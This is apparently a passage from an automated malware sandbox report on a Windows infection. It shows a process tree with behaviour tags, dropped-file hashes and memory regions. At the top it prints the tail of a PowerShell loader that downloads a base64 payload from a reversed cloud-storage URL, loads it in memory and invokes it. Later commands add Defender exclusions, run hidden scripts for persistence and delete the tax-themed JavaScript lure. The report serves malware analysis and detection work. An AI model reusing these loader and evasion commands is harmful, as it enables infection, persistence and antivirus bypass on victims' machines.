$JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''e2622eb94959-848b-e5c4-04dc-e72e429d=nekot&aidem=tla?txt.loguh/o/moc.topsppa.8e7e8-soiranollom/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js'' , ''D DDInstallUtil'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1868
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4848
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4852
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
            5⤵
              PID:5096
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gewcw.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:4516
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gewcw.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4956
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gewcw.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3456
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:4380
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2556
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4180
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vmumy.ps1"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4704
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pesister.ps1"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5024
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2888
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2964
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3532
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2968
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1560
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1160
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2536
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3344
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4468
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:3712
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js"
              5⤵
                PID:420

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gewcw.ps1

        Filesize

        426B

        MD5

        75950c063ff8b1fdacdae0f32cd31ff8

        SHA1

        849e5d9389b40e823fce61359cdc28dd171a60ee

        SHA256

        885c69a4c4d6153e400b37a36ce99de8ee7b5318c9ecf91d674a5d8cf9840c75

        SHA512

        561cca26172c654d458ef456ab3aca9f27aab5a23198a54cf6aa614b85b4cfe0c6983458e1973d9312a7d189e04a41121053f51a7fa2bfa411ade7f80527e8f9

      • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\omgdi.ps1

        Filesize

        431B

        MD5

        4918ed2c374d2301b01b4936277ed4fb

        SHA1

        7ac4d3b8007c8470981f85c2bf789d6952beb44d

        SHA256

        0df4d86827e02791f1c44daebac8257fe79ff96bbf5a87ff974f2af6dcfa90bb

        SHA512

        3b19f79f8ded9132ce0e65c81627e18bb7f75a1882bae4b7800dabb6b20e392cce93331d36f74c202f61660ce1ed67f5efc35da88840c8d6a08fad87e787ec40

      • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pesister.ps1

        Filesize

        231B

        MD5

        58ccc24156d607ef8fd1ba850f8f7bc0

        SHA1

        5883c608d1c82b66837a6bf57edafde42c650862

        SHA256

        786b29a1a80ba6374d169d5a3c838f8e77e9a2781c408022c0c108c4971d1615

        SHA512

        adc3d354ff6c1c147826ac9925377da2c6fea01499edf8e1f4cf787bed261862ef0bcfef9d17a70f7353485b8e1609106ff0351cbde96affe6bea2415f89b63a

      • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vmumy.ps1

        Filesize

        245KB

        MD5

        bee53d171b3dae17cda2a98a48ba6274

        SHA1

        e5bf8e641efa0f436be13a597ad677c352020438

        SHA256

        d7e6eda689410d5dbf794d34a672f54cbb4a5b46474e789ec03a0d00b97d8a29

        SHA512

        b373cbd3d2cd0fe8116c1db485e3ace248b8df8871984decc6e916050f6b9c84c83956652b5e2a5244c119ae1d2e5cb1884f85528e4176d1ba68810423fd6111

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        4f60d0254037d7a35064b1f678a42ed7

        SHA1

        8b9e62758829680cfc69d351688c27608b96a52c

        SHA256

        9eb5d62e311b4e8dd6cb6eeeb0ae5ddc04cb131676b706bbb3c0d46bb760403b

        SHA512

        0de0aa7131ff4235b23715004c6f5f433b355227ac2620f46a809d4a3296002c888ef03547fd9bb31bc0885d3abae0e733d3e279f4ffb0268aa30b4cfac8e9de

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        fbe40407f15453ad348c7ed3536fe05c

        SHA1

        d33ebdf2ec1b163c15637e79c03db4f5e0133ed1

        SHA256

        b134644f9f3f03a8f5b50c1e72364b0764fb770bd074d1a0058bfedfda041f38

        SHA512

        81a5434db9460434903fb1037c330eb0ad2bd413a7a52935958b10020bb4c2e1789004f629d7cde9e1566d43362a4e1fd0cc316c2dda36ba5218b712cea5d0d9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        d096831023867930e62e6d8b3d4d8ca6

        SHA1

        404a1e73dc1590f1c8b9327c396591567dac7365

        SHA256

        167f75b42ae614a8d6b0497779ff12f09605328533487f235b029e0db03ad23b

        SHA512

        31333100ddd8e04bf730118ea800843720c0f3fb69e27b89dda7fa4d717d25e838ad55a0919d47a44dd8a78d724ef8c105cfa230987cc46ba94a2b790ff91b75

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        c1a54dd5a1ab44cc4c4afd42f291c863

        SHA1

        b77043ab3582680fc96192e9d333a6be0ae0f69d

        SHA256

        c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

        SHA512

        010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        412190095aa22003e76921475e241046

        SHA1

        8ded8197516a79fda05a7044f3a9249372ac42ba

        SHA256

        2719d9049d1c5b9c03be4a8317a546f8cec012e0a471d7e0aa260cfa7fc64acf

        SHA512

        2110768c472fdfd683c9ff96c1f37d72bb2d52e089c1b23261572bb1bafd125b42074169c366a387310e7ad046daa85e811c79a90527f4721035bce9690d3f56

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        e85a6288280abfff891acf1c4d6f1d85

        SHA1

        91022f7d6a5fd05583cec40e0fa8ac3c99008f8a

        SHA256

        eb1c68bc97d3698a06d80d7ffa8c49c717d5b2eb702eff3ae611dc62aeda41e7

        SHA512

        ef4cf6b228b1c6c911ae70d651f335a3b333e7ca1786fe22d339d218c0f3c73829847d35fbb30e22f1aea8cef8a4fa12da7af2d1844c4d861577c294647064a8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        04c9ebf9c23c1d4d4a08c16e20fcceed

        SHA1

        67044e3f04584acefef2e09c2584e22e70fc5df4

        SHA256

        5ba65623b2739407ddd1fa8d75335ee54a3575893bc6a226182972c1ef881e58

        SHA512

        84cf13081ef3162995557677cfdae002ab7af81cf53ca874fbb046aa26facc375f8b533e6d2899240b3bdb06d26c6b322b60c4eca9a2a9570c54ba6d0350cd69

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        d49246229b2077d7961ee5c90e0945f8

        SHA1

        8b50bbdbc82b00f545510bc3ea9e8cd96182fa79

        SHA256

        581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c

        SHA512

        5069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        a68fcc3482ebb381cd7eb80d4dfc7ac9

        SHA1

        68f694b1b7999996678244d8ef9d95f520ec2e39

        SHA256

        1bfbb143c70207d28f8266d08a28e052467ad0eab48c65c19ba8636d44093ea0

        SHA512

        a8a5cc66e81ebb417dcd216541690a31913f8a9cbe676b76ac451c009540ef33558dba762da1736c0f61fb36dfaa71f0926ac1ab8919a892a8ab49087999a2d8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        693baf43e3d5fefa0883380c7a77c69a

        SHA1

        f3e6115432504e8bd401d8c0ff2da43e708707e5

        SHA256

        27a3015931d1f72ce982cf8f9d38dc99219ea2bb9bda4ec7b09dca9bd1122e9e

        SHA512

        29c5e093f3f86c38246fe5f1c5d6110f315937916f139289f52dbbb1e67d4f5f46e4cc928ff03ce19b91cf1d8310d40dadc65812399829da8c94f0c6f9e3f5cc

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        331841fe482ffe8b1cc1509733d8ca67

        SHA1

        1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8

        SHA256

        14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f

        SHA512

        039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        3225fbc938bbe5975c90423ad93ad467

        SHA1

        e86ffea0c7dff2ef607b6823d733ea3aaad0fdfb

        SHA256

        ecca9c939e21c21de0125143c2b2c0fbf830984e2e0ce866498316eb18a046da

        SHA512

        5c1032f57015c6e6f95cf493e292d209dce7f276863a92c04c6a19182ca0ee3d274bf7891fefbaa8c078977d1e5173729731b0524bd6be0d3f7a696bde3bb8d5

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        62623d22bd9e037191765d5083ce16a3

        SHA1

        4a07da6872672f715a4780513d95ed8ddeefd259

        SHA256

        95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

        SHA512

        9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

      • C:\Users\Admin\AppData\Local\Temp\DLL01.txt

        Filesize

        31B

        MD5

        da720063ae8011ea01a0ecf695585d85

        SHA1

        baf8dbe7ab5b598ea3092c645871b743367bc79b

        SHA256

        cb0c3de7c8c4271f963c071b5dcf3f5f09a372ac7772872f19274526217f7489

        SHA512

        3d8c94f9f193e71f62f8de9c2032ad932b1fef062b7c9be116a9e634a791854e05557e1d9826d603c98e2eb26459d97b2288fff290809004e3a246f8153d2e15

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yg4mfvrz.2ri.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\dll02.txt

        Filesize

        57KB

        MD5

        d24bfefd2aa08533d589da58f1b8decb

        SHA1

        ff6c5c414553e37a615d976b97b630d85afd3d1b

        SHA256

        e87fd2b806fca6c077c774919d04650a9292eeab97fc1bef74e11e1592219ec1

        SHA512

        f5e68d5fdc33831202c907d1e8eea7b112c833b55dcb88d0d5c4ab93412162b5bba1259d421efb9a1b81895c5d6dc2a7cc8c4733115e255cc209705cae03b6c4

      • C:\Users\Admin\AppData\Local\Temp\dll03.ps1

        Filesize

        1KB

        MD5

        d96c3b59723ccae775580c21efb725cd

        SHA1

        4c22e1158fb160e7e94d06d8316f21055ecabda3

        SHA256

        d78d94526e8d33fc7ca961e2eba3174a144dd6e9e3db1d0981f6cc2cfd98b9ae

        SHA512

        530dd86d8ce5620725fb5c3b235ddf6d29ea6ef523e7cf5c4f35254d24feefad711eaac99613dcefada736c19122f6ed96eb6bc1a7f62ed7166f2abf6e6263fe

      • memory/1868-37-0x000001BEDEED0000-0x000001BEDEEDA000-memory.dmp

        Filesize

        40KB

      • memory/3712-160-0x0000000005240000-0x00000000052A6000-memory.dmp

        Filesize

        408KB

      • memory/3712-143-0x0000000004DD0000-0x0000000004E6C000-memory.dmp

        Filesize

        624KB

      • memory/3712-144-0x0000000005420000-0x00000000059C4000-memory.dmp

        Filesize

        5.6MB

      • memory/3712-141-0x0000000000400000-0x000000000040C000-memory.dmp

        Filesize

        48KB

      • memory/3712-155-0x0000000005040000-0x00000000050D2000-memory.dmp

        Filesize

        584KB

      • memory/3712-156-0x0000000004FE0000-0x0000000004FEA000-memory.dmp

        Filesize

        40KB

      • memory/3888-103-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

        Filesize

        10.8MB

      • memory/3888-0-0x00007FFB99D13000-0x00007FFB99D15000-memory.dmp

        Filesize

        8KB

      • memory/3888-83-0x00007FFB99D13000-0x00007FFB99D15000-memory.dmp

        Filesize

        8KB

      • memory/3888-12-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

        Filesize

        10.8MB

      • memory/3888-11-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

        Filesize

        10.8MB

      • memory/3888-117-0x00007FFB99D10000-0x00007FFB9A7D1000-memory.dmp

        Filesize

        10.8MB

      • memory/3888-6-0x0000028AB96B0000-0x0000028AB96D2000-memory.dmp

        Filesize

        136KB

      • memory/4704-129-0x000001509A840000-0x000001509A84A000-memory.dmp

        Filesize

        40KB